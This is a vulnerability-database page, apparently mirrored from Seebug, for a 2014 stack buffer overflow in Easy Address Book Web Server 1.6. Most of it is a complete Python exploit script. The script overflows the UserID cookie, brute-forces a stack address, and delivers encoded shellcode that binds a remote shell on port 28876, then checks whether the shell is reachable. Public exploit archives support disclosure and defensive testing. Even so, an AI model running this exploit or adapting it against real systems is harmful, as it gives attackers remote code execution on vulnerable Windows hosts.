Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Easy Address Book Web Server 1.6 - Stack Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 25 Views

Easy Address Book Web Server 1.6 stack buffer overflow exploit for Windows X

Code

                                                #!/usr/bin/env python

# Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link: http://www.efssoft.com/eabws.exe
# Version: 1.6
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description: 
# By setting UserID in the cookie to a long string, we can overwrite EDX which 
# allows us to control execution flow when "call dword ptr [edx+28h]" is 
# executed. EDX is overwritten with an address pointing to a location on the 
# stack which in turn points to a NOP sled leading to the shellcode. This 
# address on the stack is brute forced, but doesn't take long since only the 
# 2nd byte is always different, so the address is always 0x01??B494.  
# 
# It's similar to Easy File Sharing Web Server 6.8 exploit here. 
# http://www.exploit-db.com/exploits/33352/ I suspect same code reused for 
# their Web Server series of applications. 
#
# Tested with Easy Address Book Web Server installed in the default location 
# at C:\EFS Software\Easy Address Book Web Server
#
# The exploit can sometimes fail the first time, so try a few more times and 
# you might get a shell. 

import socket
import struct
import sys

target = "172.16.229.134"
port = 80


# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Binds a shell on port 28876
# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin 
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef" +
"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0" +
"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c" +
"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5" +
"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c" +
"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0" +
"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74" +
"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6" +
"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6" +
"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a" +
"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a" +
"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb" +
"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1" +
"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04" +
"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc" +
"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7" +
"\x3e\x57\xf9"
)

for i in xrange(1,255):
    n = ""
    if i < 16:
        n = "0" + hex(i)[-1]
    else:
        n = hex(i)[2:]
 
    guess = "0x01" + n + "b494"     # value of edx used in 
                                    # "call dword ptr ds:[edx+28]
                                    # only 2nd byte changes in stack address

    nops = int(guess, 16) + 129     # addres sof nop sled is guess+129 bytes

    print "[+] Trying guess at", guess

    payload =  struct.pack("<I", nops)          # pointer to nop sled
    payload += "A"*76                           # padding
    payload += struct.pack("<I", int(guess,16)) # address containing pointer to 
                                                # nop sled

    payload += "\x90"*20                        # nop sled
    payload += shellcode                        # win!
                
    # craft the request
    buf = (
    "GET /addrbook.ghp HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host:" + target + ":" + str(port) + "\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://" + target + "/\r\n"
    "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
    "Conection: Keep-Alive\r\n\r\n"
    )

    try:
        # send the request and payload to the server
        s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s1.connect((target, port))
        s1.send(buf)
        s1.close()
    except Exception,e: 
        pass
    
    try:
        # check if we guessed the correct address by connecting to port 28876
        s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s2.connect((target, 28876))
        s2.close()
        print "\n[+] Success! A shell is waiting on port 28876!"
        sys.exit(0)
    except Exception,e:
        pass

print "\n[!] Didn't work. Sometimes it takes a few tries, so try again."

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
buffer overflow exploiteasy address bookweb server
25